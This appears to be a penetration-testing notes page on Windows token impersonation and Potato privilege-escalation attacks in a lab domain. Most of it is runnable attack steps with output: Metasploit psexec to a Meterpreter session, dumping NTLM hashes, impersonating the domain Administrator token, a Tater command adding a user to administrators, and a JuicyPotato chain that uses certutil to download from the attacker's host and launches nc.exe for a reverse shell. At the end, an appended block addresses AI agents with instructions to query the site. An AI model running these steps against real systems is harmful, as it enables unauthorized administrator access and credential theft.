# Token Impersonation - Potato attacks ## What is it * Token are temp keys that give access to a system or network without credentials. ## How to * Launch Metasploit `msfconsole` * Choose the exploit: `use exploit/windows/smb/psexec` * Set: rhosts, smbdomain, smbpass, smbuser, target (we can use `show targets` to have a list), payload * Launch the attack: `run` * We get a shell: ``` msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.0.2.8:4444 [*] 10.0.2.15:445 - Connecting to the server... [*] 10.0.2.15:445 - Authenticating to 10.0.2.15:445|marvel.local as user 'fcastle'... [!] 10.0.2.15:445 - peer_native_os is only available with SMB1 (current version: SMB3) [*] 10.0.2.15:445 - Uploading payload... oeyrkyrs.exe [*] 10.0.2.15:445 - Created \oeyrkyrs.exe... [*] Sending stage (200262 bytes) to 10.0.2.15 [+] 10.0.2.15:445 - Service started successfully... [*] 10.0.2.15:445 - Deleting \oeyrkyrs.exe... [*] Meterpreter session 1 opened (10.0.2.8:4444 -> 10.0.2.15:61871 ) at 2022-02-11 13:49:12 -0500 meterpreter > ``` * Getting hashes: `hashdump` ``` meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e6cedee56d27d175f48042b53cb6b242::: ``` * Use tools: `load` (double tab to get the list of tools) * `load incognito` ``` Incognito Commands ================== Command Description ------- ----------- add_group_user Attempt to add a user to a global group with all tokens add_localgroup_user Attempt to add a user to a local group with all tokens add_user Attempt to add a user with all tokens impersonate_token Impersonate specified token list_tokens List tokens available under current user context snarf_hashes Snarf challenge/response hashes for every token ``` * list\_tokens -u ``` meterpreter > list_tokens -u Delegation Tokens Available ======================================== Font Driver Host\UMFD-0 Font Driver Host\UMFD-1 Font Driver Host\UMFD-2 MARVEL\Administrator MARVEL\fcastle NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Window Manager\DWM-1 Window Manager\DWM-2 Impersonation Tokens Available ======================================== No tokens available ``` * Impersonate Administrator: ``` meterpreter > impersonate_token marvel\\administrator [+] Delegation token available [+] Successfully impersonated user MARVEL\Administrator meterpreter > shell Process 8576 created. Channel 1 created. Microsoft Windows [Version 10.0.19044.1288] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami marvel\administrator ``` * If we hashdump again it will not work so we can rev2self to get back to the initial user * Any user that has logged in the target will have a token there until the target reboots ## Potato Attacks * These attacks requires the `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` to be enabled on the machine. ### Hot potato * We can use [Tater](https://github.com/Kevin-Robertson/Tater) * `powershell.exe -nop -ep bypass` * `Import-Module .\Tater.ps1` * `Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"` * Your user should be in the administrators group `net localgroup administrators` to check * See [here](/pentips/writeups/htbwriteups/htb-jeeves.md) an example of a potato attack ### Juicy potato #### Enumeration after initial shell with MSSQL * Say we have a shell on an mssql instance `mssqlclient.py sql_dev@IP-ADD -windows-auth` * We can enable command shell using `enable_xp_cmdshell` * And then we will be able to type every command we need this way: `xp_cmdshell whoami /priv` * For juicy potato we need to check if we have `SeImpersonatePrivilege` enabled\ ![image](https://user-images.githubusercontent.com/96747355/163688651-8f07b5f6-4b0d-4ece-bb80-8249770d3b29.png) * We do! #### Exploitation * Let's get JuicyPotato binary in our attacking machine `wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe` * Let's serve the file to our target using python http server `python3 -m http.server 80` * Let's take it in our shell using certutil `xp_cmdshell certutil.exe -urlcache -f http://10.10.14.117/JuicyPotato.exe C:\Tools\JuicyPotato.exe` * Let's get an admin shell `xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.117 8443 -e cmd.exe" -t *` where -l is the COM server listening port, -p is the program to launch (cmd.exe), -a is the argument passed to cmd.exe, and -t is the createprocess call. We are trying both the CreateProcessWithTokenW and CreateProcessAsUser functions, which need SeImpersonate or SeAssignPrimaryToken privileges respectively. * And we should have an authority system shell\ ![image](https://user-images.githubusercontent.com/96747355/163689119-b9682c58-c8cc-421b-9d62-1e2d7451f525.png) ## Resources {% embed url="" %} Rotten Potato - Foxglove Security {% endembed %} {% embed url="" %} Juicy Potato {% endembed %} {% embed url="" %} TCM Security - Windows privilege escalation {% endembed %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://csbygb.gitbook.io/pentips/windows/post-compromise-attack/token-impersonation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.